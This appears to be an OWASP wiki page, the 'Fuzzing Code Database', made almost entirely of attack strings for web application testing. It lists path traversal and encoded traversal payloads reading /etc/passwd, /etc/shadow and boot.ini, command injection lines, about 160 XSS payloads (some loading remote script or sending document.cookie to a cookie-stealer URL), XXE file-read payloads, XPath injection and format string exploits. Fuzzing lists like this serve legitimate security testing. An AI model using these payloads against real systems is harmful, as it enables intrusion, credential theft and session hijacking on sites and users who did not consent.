%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini

Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".

XSS Statements - Most effective/most common statements

Testing Statements

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
'';!--"<XSS>=&{()}

Common exploit code (covers a lot of XSS vulnerabilities)

'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)

Statements
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
"<IMG SRC=""javascript:alert('XSS');"">"
<IMG SRC=JaVaScRiPt:alert('XSS')>
"<IMG SRC=javascript:alert(""XSS"")>"
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
"<IMG SRC=""jav"
"ascript:alert('XSS');"">"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
"<IMG SRC="" &#14;  javascript:alert('XSS');"">"
"<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
"<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
"<IMG SRC=""javascript:alert('XSS')"""
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
"\"";alert('XSS');//"
"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
<BODY ONLOAD=alert('XSS')>
"<IMG DYNSRC=""javascript:alert('XSS')"">"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
"<BR SIZE=""&{alert('XSS')}"">"
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
"<XSS STYLE=""behavior: url(xss.htc);"">"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
¼script¾alert(¢XSS¢)¼/script¾
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
"<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">"
"<DIV STYLE=""width: expression(alert('XSS'));"">"
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
"<BASE HREF=""javascript:alert('XSS');//"">"
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'""-->"
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">"" '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<A HREF=""http://66.102.7.147/"">XSS</A>"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
"<A HREF=""http://1113982867/"">XSS</A>"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
"<A HREF=""h\ntt\tp://6"
"<A HREF=""//www.google.com/"">XSS</A>"
"<A HREF=""//google"">XSS</A>"
"<A HREF=""http://google.com/"">XSS</A>"
"<A HREF=""http://www.google.com./"">XSS</A>"
"<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>"
"<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>"
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&{document.write(""XSS-XSS-XSS"");};"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
"<div style=""behaviour: url([link to code]);"">"
"<div style=""binding: url([link to code]);"">"
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<style><!--</style><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<![CDATA[<!--]]><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
"<div style=""binding: url([link to code]);""> [Mozilla]"
"<!-- -- --><script>document.write(""XSS-XSS-XSS"");</script><!-- -- -->"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
><script>
"<script>alert(""WXSS"")</script>"
"<<script>alert(""WXSS"");//<</script>"
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>
&ltscript&gtalert(document.cookie);&ltscript&gtalert
<xss><script>alert('WXSS')</script></vulnerable>
<IMG%20SRC='javascript:alert(document.cookie)'>
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS')"""
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
<IMG%20SRC=javascript:alert("WXSS")>
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc
"<IMG%20SRC=""jav"
"<IMG%20SRC=""jav	ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""%20&#14;%20javascript:alert('WXSS');"">"
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC=javascript:alert('XSS')>
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--<XSS>=&{()}"


XML Attacks - (Update: 11 August 2009 - Total Statements: 15)

Statements
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"

Format String Statements - (Update: xx/xx/xx - Total Statements: 28)

%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
f(x)=%s x 123
f(x)=%x x 255
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;

Project Contributor

Project Leader: Wagner Elias

Reviewer: Eduardo Neves

Contributor: Ulisses Castro

Feedback and Participation

We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org

Project Identification

PROJECT INFO
What does this OWASP project offer you?
what is this project?
OWASP Fuzzing Code Database

Purpose: N/A

License: N/A

who is working on this project?
Project Leader: Wagner Elias

Project Maintainer:

Project Contributor(s): N/A

how can you learn more?
Project Pamphlet: N/A

3x slide Project Presentation: N/A

Mailing list: Subscribe or read the archives

Project Roadmap: N/A

Main links: N/A

Project Health: Yellow button.JPG Not Reviewed (Provisional)
To be reviewed under Assessment Criteria v2.0

Key Contacts
  • Contact Wagner Elias to contribute, review or sponsor this project
  • Contact the GPC to report a problem or concern about this project or to update information.

This category currently contains no pages or media.